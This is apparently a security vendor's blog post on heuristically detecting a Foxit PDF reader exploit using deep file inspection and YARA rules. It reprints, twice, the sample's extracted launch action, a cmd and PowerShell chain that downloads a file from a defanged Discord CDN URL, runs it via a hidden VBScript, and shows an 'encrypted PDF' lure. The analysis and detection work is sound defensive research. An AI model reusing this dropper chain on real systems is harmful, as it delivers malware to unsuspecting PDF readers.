Detecting New Threats: The Heuristic Approach with DFI
In today’s market of information security products, cutting-edge proprietary solutions tend to dominate show floors and presentation halls worldwide. Many vendors have invested heavily in the arms race, which is AI, to detect malicious files in the vast threat landscape. Machine learning-driven efforts continue to show massive potential for lightening defenders’ workload, but where do the features come from to train these ML models? Specialized dissection and signature-driven detection is essential to produce the most effective model for various file types. In this blog, we will explore the traditional heuristic approach to detecting new vulnerabilities in the wild such as the Foxit PDF exploit covered by various outlets earlier this month.
The most commonly developed threats leveraged by commodity malware authors and distributors tend to lean toward ease of delivery and deployment. The most ubiquitous platforms and file types are favored over others that rely on software and related dependencies that may not be present on targeted hosts. Casting a wide net, so to speak, enables these actors to reach as many potential victims and greatly increases the odds of a successful compromise. This paradigm accounts for the prevalence of malicious PowerShell and JavaScript embedded within various common file formats for initial access purposes. In the case of this PDF exploit, the threat actor relies on victims running Foxit PDF reader to ignore the security popup warnings to execute CMD which runs the malicious PowerShell command embedded in the document. At InQuest, our focus leans left of boom, detecting initial access methods and associated files before users can interact. Deep File Inspection (DFI) helps us achieve this by drilling down on specific segments of a file rather than the whole. Below we have extracted PDF content from a sample mentioned in Checkpoint’s coverage of the Foxit PDF exploit.
PDF Comment '%PDF-1.1\\r\\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F (cmd.exe)
/P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\\'hXXps://cdn.discordapp[.]com/attachments/1206721383820820553/1226299559009980426/HeavenTool.bat?ex=66244376&is=6611ce76&hm=61f28f87755265f1bacdefbaca8a86e4c5fa71c20206702f4816bc81358fac16&\\', \\'payload.exe\\')"'
>>
msd89h2j389uh.bat &@echo timeout
/ t 5
>>
msd89h2j389uh.bat &@echo start payload.exe
>>
[(1, '\\r\\n'), (2, '<<'), (1, '\\r\\n '), (2, '/OpenAction'), (1, ' '), (2, '<<'), (1, '\\r\\n '), (2, '/S'), (1, ' '), (2, '/Launch'), (1, ' '), (2, '/Win'), (1, '\\r\\n '), (2, '<<'), (1, '\\r\\n '), (2, '/F'), (1, ' '), (2, '('), (3, 'cmd.exe'), (2, ')'), (1, ' '), (2, '/P'), (1, ' '), (2, '('), (2, '/c'), (1, ' '), (3, 'cD'), (1, ' '), (2, '%tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\\'hXXps://cdn.discordapp[.]com/attachments/1206721383820820553/1226299559009980426/HeavenTool.bat?ex=66244376&is=6611ce76&hm=61f28f87755265f1bacdefbaca8a86e4c5fa71c20206702f4816bc81358fac16&\\', \\'payload.exe\\')">> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs\\r\\n'), (1, ' '), (3, 'PDF'), (1, ' '), (3, 'Encrypted.'), (1, ' '), (3, 'Please'), (1, ' '), (3, 'click'), (2, ')'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n '), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\\r\\n '), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n')]
PDF Comment '%PDF-1.1\\r\\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F (cmd.exe)
/P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\\'hXXps://cdn.discordapp[.]com/attachments/1206721383820820553/1226299559009980426/HeavenTool.bat?ex=66244376&is=6611ce76&hm=61f28f87755265f1bacdefbaca8a86e4c5fa71c20206702f4816bc81358fac16&\\', \\'payload.exe\\')"'
>>
msd89h2j389uh.bat &@echo timeout
/ t 5
>>
msd89h2j389uh.bat &@echo start payload.exe
>>
[(1, '\\r\\n'), (2, '<<'), (1, '\\r\\n '), (2, '/OpenAction'), (1, ' '), (2, '<<'), (1, '\\r\\n '), (2, '/S'), (1, ' '), (2, '/Launch'), (1, ' '), (2, '/Win'), (1, '\\r\\n '), (2, '<<'), (1, '\\r\\n '), (2, '/F'), (1, ' '), (2, '('), (3, 'cmd.exe'), (2, ')'), (1, ' '), (2, '/P'), (1, ' '), (2, '('), (2, '/c'), (1, ' '), (3, 'cD'), (1, ' '), (2, '%tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\\'hXXps://cdn.discordapp[.]com/attachments/1206721383820820553/1226299559009980426/HeavenTool.bat?ex=66244376&is=6611ce76&hm=61f28f87755265f1bacdefbaca8a86e4c5fa71c20206702f4816bc81358fac16&\\', \\'payload.exe\\')">> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs\\r\\n'), (1, ' '), (3, 'PDF'), (1, ' '), (3, 'Encrypted.'), (1, ' '), (3, 'Please'), (1, ' '), (3, 'click'), (2, ')'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n '), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\\r\\n '), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\\r\\n '), (2, '>>'), (1, '\\r\\n')]
Using DFI, we can break down the PDF into components for static detection rather than trying to work with the PDF as is. Those following along at home can use PDF parser to get similar outputs to begin writing detection signatures. Rather than attempting to detect only suspicious and malicious content, we want to capture benign characteristics as well for future detection. As campaigns mature and progress, so do their methods and evasive tactics. Obfuscation may cause production grade signatures to drop off with newer iterations of the malicious document. With generic detection signatures, we can get a birds-eye view of content present in a document that may prompt further investigation. The following YARA rules serve as an example for how we may have been able to detect the above heuristically.
rule Generic_PDF_Contains_Batch_Script
{
strings:
$pdf_anchor = "PDF Comment '%PDF"
$bat_1 = /\\b[a-z0-9]+\\.bat/ nocase
condition:
$pdf_anchor at 0
and any of ($bat_*)
}
rule Generic_PDF_Contains_VBScript
{
strings:
$pdf_anchor = "PDF Comment '%PDF"
$vb_1 = /\\b[a-z0-9]+\\.vbs/ nocase
condition:
$pdf_anchor at 0
and any of ($vb_*)
}
rule Generic_PDF_Contains_PowerShell_Reference
{
strings:
$pdf_anchor = "PDF Comment '%PDF"
$ps_1 = "powershell" nocase
condition:
$pdf_anchor at 0
and any of ($ps_*)
}
rule Generic_PDF_Contains_Discord_CDN_URL
{
strings:
$pdf_anchor = "PDF Comment '%PDF"
$url_1 = /https:\\/\\/cdn\\.discordapp\\.com\\/[^'")]+/ nocase
condition:
$pdf_anchor at 0
and any of ($url_*)
}
With a small collection of generic file characteristic signatures we get an idea of the contents of PDFs that these would fire on. Our threat detection engine can be configured to elevate threat scores on various combinations of signatures firing on a given sample. This allows for detecting a wider breadth of threats in the wild with reduced risk for false positives. Using the generic signatures above, we might produce elevated threat scores on PDFs containing mentions of PowerShell and VBScript alone. It’s possible that the next iteration of this threat might pivot to another external location for content delivery if community detection efforts reach a point where payloads no longer reach targeted users. A healthy dose of heuristic detection goes a long way towards keeping attackers at bay.
PDF Samples
https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation
- d44f161b75cba92d61759ef535596912e1ea8b6a5a2067a2832f953808ca8609
- 9c5883cf118f1d22795f7b5661573f8099554c5a3f78d592e8917917baa6d20f
- 2aa9459160149ecefd1c9b63420eedc7fe3a21ae0ca3e080c93fd39fef32e9c0
- 8155a6423d64f30d2994163425d3fbe14a52927d3616ffacea36ddc71a6af4b0
- c1436f65acbf7123d1a45b0898be69ba964f0c6d569aa350c9d8a5f187b3c0e7
- de8ecd738f1f24a94aba06f19d426399bc250cc5e7b848b2cbd92fc1d6906403
- d5483049dc32d1a57e759839930fe17fe31a5f513d24074710f98ec186f06777
- 19a8201c6a3063b897d696330c1b60bd97914514d2ae6a6c3c1796bec236724a